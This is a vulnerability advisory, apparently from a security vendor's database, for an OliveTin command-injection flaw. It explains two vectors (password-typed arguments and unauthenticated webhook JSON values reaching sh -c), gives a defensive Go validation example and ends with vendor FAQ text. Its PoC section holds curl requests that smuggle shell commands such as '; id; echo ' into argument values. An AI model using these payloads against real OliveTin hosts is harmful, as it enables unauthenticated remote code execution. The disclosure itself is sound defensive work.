Summary
OliveTin's shell mode safety check (checkShellArgumentSafety) blocks several dangerous argument types but not password. A user supplying a password-typed argument can inject shell metacharacters that execute arbitrary OS commands. A second independent vector allows unauthenticated RCE via webhook-extracted JSON values that skip type safety checks entirely before reaching sh -c.
Details
Vector 1, password type bypasses shell safety check (PR:L)
service/internal/executor/arguments.go has two gaps:
// Line 198-199, TypeSafetyCheck returns nil (no error) for password type
case "password":
    return nil // accepts ANY string including ; | ` $()

// Line 313, checkShellArgumentSafety blocks dangerous types but not password
unsafe := map[string]bool{
    "url":                       true,
    "email":                     true,
    "raw_string_multiline":      true,
    "very_dangerous_raw_string": true,
    // "password" is absent, not blocked
}
Shell execution at service/internal/executor/executor_unix.go:18:
exec.CommandContext(ctx, "sh", "-c", finalParsedCommand)
A user supplies a password argument value of '; id; echo ' → sh -c interprets the shell metacharacters → arbitrary command execution.
This is not the "admin already has access" pattern: OliveTin explicitly enforces an admin/user boundary where admins define commands and users only supply argument values. The password type is the documented, intended mechanism for user-supplied sensitive values. The safety check exists precisely to prevent users from escaping this boundary; password is the one type it fails to block.
Vector 2, Webhook JSON extraction skips TypeSafetyCheck entirely (PR:N)
service/internal/executor/handler.go:153-157 extracts arbitrary key-value pairs from webhook JSON payloads and injects them into ExecutionRequest.Arguments. These webhook-extracted arguments have no corresponding config-defined ActionArgument entry, so parseActionArguments() in arguments.go finds no type to check against and skips TypeSafetyCheck entirely. The values are templated directly into the shell command and passed to sh -c.
Example: an admin command template git pull && echo {{ git_message }} with Shell mode enabled. A webhook POST with {"git_message": "x; id"} injects id into the shell command. The webhook endpoint is unauthenticated by default (authType: none in default config).
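Both vectors share one root cause: a value reaches sh -c without a check that is keyed to the admin-defined argument list. The following Go program is an added illustration of the defensive shape, written for this page and not taken from OliveTin's code base. The names ArgDef, ActionDef, ValidateArgs and BuildCommand are hypothetical; the sample action and values are constructed. It closes the password vector by treating password as shell-unsafe, closes the webhook vector by rejecting any argument name the admin did not define, and shows the safer execution pattern in which untrusted values travel to the shell as environment variables rather than as part of the string the shell parses.

```go
package main

import (
	"errors"
	"fmt"
	"os/exec"
	"regexp"
)

// ArgDef mirrors an admin-defined argument: a name and a declared type.
// (Hypothetical type for this example, not OliveTin's ActionArgument.)
type ArgDef struct {
	Name string
	Type string
}

// ActionDef is an admin-defined action: whether it runs via sh -c, and its arguments.
type ActionDef struct {
	ID    string
	Shell bool
	Args  []ArgDef
}

// shellMeta is a deny-list of characters that change how sh parses a command line.
// It is a last line of defence only; the allow-lists below do the real work.
var shellMeta = regexp.MustCompile("[;&|`$(){}<>\\\\\"'\\n\\r]")

// typePattern is the per-type allow-list. "password" deliberately has no pattern,
// because a secret may legitimately contain any character; that is exactly why it
// must never be templated into a shell string.
var typePattern = map[string]*regexp.Regexp{
	"ascii_identifier": regexp.MustCompile(`^[A-Za-z0-9_-]+$`),
	"int":              regexp.MustCompile(`^-?[0-9]+$`),
}

// shellUnsafeTypes lists types whose values may not be used with shell mode at all.
// Compared with the page's map, "password" is added.
var shellUnsafeTypes = map[string]bool{
	"url": true, "email": true, "raw_string_multiline": true,
	"very_dangerous_raw_string": true,
	"password": true,
}

var ErrUnknownArg = errors.New("argument not defined for action")

// ValidateArgs rejects (1) any supplied name with no admin-defined ArgDef, so values
// extracted from a webhook body cannot bypass typing; (2) shell-unsafe types in shell
// mode, password included; (3) values failing their type allow-list; and (4) as a
// backstop, shell metacharacters in any value bound for sh -c.
func ValidateArgs(action ActionDef, supplied map[string]string) error {
	defs := make(map[string]ArgDef, len(action.Args))
	for _, d := range action.Args {
		defs[d.Name] = d
	}
	for name, value := range supplied {
		def, ok := defs[name]
		if !ok {
			return fmt.Errorf("%w: %q", ErrUnknownArg, name)
		}
		if action.Shell && shellUnsafeTypes[def.Type] {
			return fmt.Errorf("type %q may not be used in shell mode (argument %q)", def.Type, name)
		}
		if pat, ok := typePattern[def.Type]; ok && !pat.MatchString(value) {
			return fmt.Errorf("argument %q does not match type %q", name, def.Type)
		}
		if action.Shell && shellMeta.MatchString(value) {
			return fmt.Errorf("argument %q contains shell metacharacters", name)
		}
	}
	return nil
}

// BuildCommand shows the safer execution pattern: the template refers to arguments
// only as "$ARG_<name>", and the values are passed through the environment, so they
// never become part of the string sh parses. The command is returned, not run.
func BuildCommand(template string, args map[string]string) *exec.Cmd {
	cmd := exec.Command("sh", "-c", template)
	cmd.Env = []string{"PATH=/usr/bin:/bin"}
	for name, value := range args {
		cmd.Env = append(cmd.Env, "ARG_"+name+"="+value)
	}
	return cmd
}

func main() {
	// Constructed sample: the page's git-deploy style action, with one typed argument.
	action := ActionDef{ID: "git-deploy", Shell: true, Args: []ArgDef{{Name: "git_message", Type: "ascii_identifier"}}}
	fmt.Println("undefined key:", ValidateArgs(action, map[string]string{"git_author": "x"}))
	fmt.Println("valid value:  ", ValidateArgs(action, map[string]string{"git_message": "release-1"}))
	cmd := BuildCommand(`git pull && echo "$ARG_git_message"`, map[string]string{"git_message": "release-1"})
	fmt.Println("argv:", cmd.Args, "env:", cmd.Env)
}
```

The point of BuildCommand is that even if a value slipped past validation, `sh` receives it as data in an environment variable and the template quotes the expansion, so the value cannot alter the command's structure.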
PoC
# Vector 1, authenticated user with password-type argument
curl -X POST http://localhost:1337/api/StartAction \
-H "Content-Type: application/json" \
-d '{"actionId": "run-command", "arguments": [{"name": "pass", "value": "'; id; echo '"}]}'
# Vector 2, unauthenticated webhook
curl -X POST http://localhost:1337/webhook/git-deploy \
-H "Content-Type: application/json" \
-d '{"git_message": "x; id #", "git_author": "attacker"}'
Confirmed on jamesread/olivetin:latest (3000.10.0), 3/3 runs. Both vectors produced uid=1000(olivetin) output and arbitrary file write to /tmp/pwned.
Impact
- Vector 1: Any authenticated user (registration enabled by default, authType: none by default) can execute arbitrary OS commands on the OliveTin host with the permissions of the OliveTin process.
- Vector 2: Unauthenticated attacker can achieve the same if the instance receives webhooks from external sources, which is a primary OliveTin use case.
Combined: unauthenticated RCE on any OliveTin instance using Shell mode with webhook-triggered actions.
Untrusted input reaches a shell command, allowing arbitrary commands to run on the host. Typical impact: code execution in the application's environment.
CVE-2026-27626 has a CVSS score of 9.9 (Critical). The attack vector is network-reachable, requires only low privileges, and needs no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.0.0-20260222101908-4bbd2eab1532); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-27626? CVE-2026-27626 is a critical-severity OS command injection vulnerability in github.com/OliveTin/OliveTin (go), affecting versions < 0.0.0-20260222101908-4bbd2eab1532. It is fixed in 0.0.0-20260222101908-4bbd2eab1532. Untrusted input reaches a shell command, allowing arbitrary commands to run on the host.
- How severe is CVE-2026-27626? CVE-2026-27626 has a CVSS score of 9.9 (Critical). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of github.com/OliveTin/OliveTin are affected by CVE-2026-27626? github.com/OliveTin/OliveTin (go) versions < 0.0.0-20260222101908-4bbd2eab1532 are affected.
- Is there a fix for CVE-2026-27626? Yes. CVE-2026-27626 is fixed in 0.0.0-20260222101908-4bbd2eab1532. Upgrade to this version or later.
- Is CVE-2026-27626 exploitable, and should I be worried? Whether CVE-2026-27626 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
- What actually determines whether CVE-2026-27626 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-27626? Upgrade github.com/OliveTin/OliveTin to 0.0.0-20260222101908-4bbd2eab1532 or later.